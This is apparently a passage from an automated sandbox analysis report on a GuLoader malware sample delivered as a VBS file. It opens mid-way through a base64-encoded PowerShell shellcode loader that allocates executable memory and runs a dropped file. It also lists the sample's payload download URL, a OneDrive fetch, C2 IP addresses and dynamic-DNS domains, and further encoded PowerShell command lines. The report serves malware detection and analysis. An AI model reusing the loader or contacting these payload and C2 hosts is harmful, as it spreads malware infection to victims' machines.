QBrACAARgBhAHMAYQBuAGgAYQBuADkAIABTAFAASQBEAFMASwBBAEEATAAgAEwAdQByAGUANwAgAEwAYQBkAG4AaQAgAE8AVgBFAFIAUgBLACAATABZAEMAVQBTAFQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGQAbwB0AHIAaQBhAGMAbwBuADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEEAcgB0AGgAcgBvAGMAbAA5ACwAdQBpAG4AdAAgAGEAcgByAGEAeQAsAGkAbgB0ACAARgBJAEYAVQBMAFIARABFAEkALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADAALABpAG4AdAAgAFMASwBSAE8AVABQAFIALABpAG4AdAAgAEMAYQBzAHMAaQBkAGkAZAAsAGkAbgB0ACAAVQBuAGEAbgBuAGUAYQBsAGUANQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAEsARQBSAE4ARQBMADMAMgAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AIgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAYQBjACgAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBMAFAAUwB0AHIAKQBdAHMAdAByAGkAbgBnACAAQQByAHQAaAByAG8AYwBsADkALAB1AGkAbgB0ACAAYQByAHIAYQB5ACwAaQBuAHQAIABGAEkARgBVAEwAUgBEAEUASQAsAGkAbgB0ACAAZABvAHQAcgBpAGEAYwBvAG4AMAAsAGkAbgB0ACAAUwBLAFIATwBUAFAAUgAsAGkAbgB0ACAAQwBhAHMAcwBpAGQAaQBkACwAaQBuAHQAIABVAG4AYQBuAG4AZQBhAGwAZQA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABkAG8AdAByAGkAYQBjAG8AbgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGMAZQBhAG4AbwBsAG8ANgAsAGkAbgB0ACAATQByAGsAbABnACwAcgBlAGYAIABJAG4AdAAzADIAIABkAG8AdAByAGkAYQBjAG8AbgAsAGkAbgB0ACAARABFAEMASQBQAEgALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAATQByAGsAbABnADAALAB1AGkAbgB0ACAATQByAGsAbABnADEALABJAG4AdABQAHQAcgAgAE0AcgBrAGwAZwAyACwAcgBlAGYAIABJAG4AdAAzADIAIABNAHIAawBsAGcAMwAsAGkAbgB0ACAATQByAGsAbABnADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAATQByAGsAbABnADUALABpAG4AdAAgAE0AcgBrAGwAZwA2ACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBNAGkAYQBzAG0AIABQAHMAZQB1AGQAbwBzADkAIABLAG8AbgBkAG8AbABlAG4AYwA4ACAAcgBlAHAAcgBvACAASQBuAHQAZQBnADUAIABTAGsAdQBtAHIAOAAgAEUAUgBHAE8ARABJAEMASQAgAEsAQQBWAEEAIAB5AG4AZABpAGcAZQByACAATABuAHUAZAB2AGkAawBsAGkAOQAgAGcAYQBzAGIAbwByACAAcgB1AG4AZABlAHMAYQAgAFcAZQBhAHAAIABBAEUAUgBPAEQAVQBDAFQAUwBWACAAUwB2AGkAbgBlADMAIABLAHUAbABsAGEAZwByAGUAcwA4ACAARgBvAHIAcwB0AGEAYQBlAGwANwAgAHMAaAByAHUAZwBnAGkAbgAgAEcAUgBVAFMATwBNACAAQgBhAHMAaQBzAHUAZABkAGEAbgAgAFAATgBFAFUATQAgAEQAUgBBAEEAQgBFAEkATgAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAFAAVABFAFIATwBTAFQASQAuAGQAYQB0ACIADQAKACMAUwB0AHIAYQBrACAAUgBlAGcAaQBzAHQAcgBhAG4AdAAgAGoAbwBnAG4AaQBuAGcAcwAgAGMAbwByAG4AdQAgAEYAYQBrAHQAdQByAGEAYgAgAEQAZQBzAGUAcgB0ADgAIABLAEEATgBEAEkAIABTAGkAZQBnAGUAZABnAGkAZgB0ADYAIABQAHIAZQBjAGkAIAB2AGUAcwBpAGMAbwAgAHYAZQBqAHIAZgBvAHIAIAANAAoAJABkAG8AdAByAGkAYQBjAG8AbgAzAD0AMAA7AA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAZABvAHQAcgBpAGEAYwBvAG4AOAA9AFsAZABvAHQAcgBpAGEAYwBvAG4AMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgAzACwAMAAsAFsAcgBlAGYAXQAkAGQAbwB0AHIAaQBhAGMAbwBuADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBQAGwAZQB0ADcAIABFAGsAcwBpAGwAcgBiAG8AcgAyACAARwByAGkAbQBtACAAUAByAG8AcwBlAGMAdABpADMAIABEAEUATgBJAFoARABJAE0AIABCAHIAbQBtAGUAcgAgAEEAZAB2AG8AawBhAHQANgAgAFQAYQByAGUAMQAgAFAAYQBhAHQAYQBnAGUAIABpAG0AcABsAGUAbQAgAFUAbgBhAHMAYwBlAG4AZAA5ACAARgBpAG4AbgA4ACAAQwBPAE0AUABBAFQAIABzAGwAaQBrAG0AdQBuAGQAIABzAGkAcwBoAGEAbQAgAE0ASQBSAEEAQwBMAEUAUwBCACAAQgBlAGwAZABhAG0AcwB0AG8AcgAgAEsAaQBkAG4AYQBwADQAIABTAHUAZABzAGUAcwBwAGEAZwB1ACAAUwBBAEEATABFAEwARABFAFIARQAgAHMAdABhAHQAaQBzAHQAaQAgAEMAZQByAHYAaQBjAGkAcABsACAAUgBpAG0AZQBuAGUAMgAgAEIARQBCAE8ARQBSAEUATAAgAHQAcgBhAG4AcwBzAGsAcgAgAEwAZQB2AG4AZQBkAGUAIABpAHIAcgBlAHAAdAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADQAPQBbAGQAbwB0AHIAaQBhAGMAbwBuADEAXQA6ADoAVgBpAGEAYwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBOAE8ATgBFAEwARQAgAFIAZQBlAG0AcABoAGEAcwA4ACAARgBPAFIAQgBFAEQAIABSAEkAQwBJAE4AVQBTAEUAUwBCACAAVQBuAHMAYwBhAGIAYgBlADgAIABkAGkAYQBtAGUAdAAgAEEAbgB0AGgAcgBvAHAAbwBsAG8AIAB2AHIAdABzAGwAYQBuAGQAIABGAGEAcgB2AGUAYgBsAHkAIABBAFUAWABPAFQATwBYAFMASAAgAE4AUgBHAEEAQQBFAE4ASAAgAEQAdQBkAGUAIABSAEkARgBTAFMAVABSAEEARgBGACAAcQB1AGEAbABtACAAUwBVAEQAQQBOAEUAIABHAGUAbgBmAGQAcwBlACAASABvAHYAZQBkAGsAdQBsACAAUABJAEMAQwAgAFAARQBSAEEAQwBJAEQASQBUACAAbABpAHMAdABlACAAVgBFAFIATgBBAEwAIABPAHUAdABiAGEAbABhACAAUwB0AG8AcgAxACAAVwBlAHQAdABhACAAQwBvAGgAZQBzAGkANQAgAGgAagBlAG0AIAByAGEAZABpAG8AZQByAHMAYwBsACAAZQB4AHQAcgBhAHYAYQBzAGEAdAAgAEMAYQBsAHYAZQAgAGEAbgBoAGUAdQAgAEYATwBSAEgAQQBOAEQATAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADUAPQAwADsADQAKACMAUwBsAHkAbgBnAHIAbwBzAGUANwAgAHYAaQBhAGoAYQBjAGEAaQBtAHAAIABCAGUAbABhAHIAaQAgAFMAcAByAGkAbgBnACAASwBlAHIAdQA5ACAAYwBhAHkAdQBjAG8AZgB5AHIAdAAgAEEARgBNAE4AUwBUAFIARQAgAEsASQBUAEMASAAgAFMAcABvAG4AZwBpAG8AcABsAGEANAAgAE8AdgBlAHIAbAAgAGYAbwB1AGUAdAB0AGUAZQBoAGEAIABYAEkAUABIAE8AIABQAG8AbABsAGIAbwBvAGsAdwA5ACAARgByAG8AcwB0AGsAIABQAEgATwBTAFAASABPAEwASQAgAHMAYQBuAGcAZQBsAG4AYQAgAGsAbwBsAGkAYgByACAARgBsAHkAdgBlAGcAcgAgAGIAdQBsAGIAZQBsAG4AZQBkACAATQBvAGQAdABhADcAIABiAGwAZQBzAGsAdQAgAEIAZQBrAGkAcwBzAGkAOAAgAFUARABUAE8ATgBJAE4ARwBFACAAZwByAGQAaQBhAGIAZQB0AGkAawAgAEEAcgBtAGEAIABQAE8ASQBOAEQAIABSAGUAawBlAHkAZQBkAGgAIABvAGIAcwBjAHUAcgBlAHIAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEMARABBAEMAKAAkAGQAbwB0AHIAaQBhAGMAbwBuADQALAAkAGQAbwB0AHIAaQBhAGMAbwBuADMALAA1ADgAMwA0ADYALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgA1ACwAMAApAA0ACgAjAFUAbgBpAG4AdgBlAG4AdABpACAARABEAEQAUgBVAEsASwBFAE4AIABBAHUAcgBhACAAUwB0AHIAZQBsAHQAegBpAGcAYQAgAFYAYQBsAHUAdABhAGwAYQBhACAASQByAHIAZQAxACAAaABlAHIAbABpAGcAIABCAEUAUwBQAE8AVAAgAE8AUABIAEEAVgBTAFIARQBUACAAQgByAGkAbgAgAGYAbwByAGUAcwBlAHQAdABsACAAaABhAGEAcgBkAGYAcgBvAHMAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMwAsACAAMAApAA0ACgANAAoA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
  • 0x1eaa:$s12: Wscript.Shell
00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
    Multi AV Scanner detection for submitted file
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Antivirus detection for URL or domain
    Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URL
    Source: vegproworld.comVirustotal: Detection: 5%Perma Link
    Source: unknownHTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2
    Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    Potential malicious VBS script found (has network functionality)
    Source: Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeDropped file: MILIEUFOR1.SaveToFile FileName, adSaveCreateOverWriteJump to dropped file
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://vegproworld.com/wp-content/Touchb.vbs
    Uses dynamic DNS services
    Source: unknownDNS query: name: toshiba1122.ddns.net
    Source: unknownDNS query: name: toshiba1122.duckdns.org
    Source: Joe Sandbox ViewASN Name: VCG-ASNG VCG-ASNG
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 13.107.43.13 13.107.43.13
    Source: Joe Sandbox ViewIP Address: 148.66.138.165 148.66.138.165
    Source: global trafficHTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vegproworld.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: onedrive.live.comCache-Control: no-cacheCookie: MUID=20718A960FA8687F03949A000BA86C7A
    Source: global trafficTCP traffic: 192.168.11.20:49741 -> 194.5.98.59:3360
    Source: global trafficTCP traffic: 192.168.11.20:49742 -> 197.210.226.45:3360
    Source: global trafficTCP traffic: 192.168.11.20:49752 -> 197.210.226.89:3360
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jgdbpa.am.files.1drv.com/
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Y
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaq
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/:
    Source: ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304
    Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/ndows
    Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vegproworld.com/:k
    Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vegproworld.com/rj-$
    Source: ieinstal.exe, 00000009.00000002.8457894075.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vegproworld.com/wp-content/Touchb.vbs
    Source: unknownDNS traffic detected: queries for: vegproworld.com
    Source: global trafficHTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vegproworld.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: onedrive.live.comCache-Control: no-cacheCookie: MUID=20718A960FA8687F03949A000BA86C7A
    Source: unknownHTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIA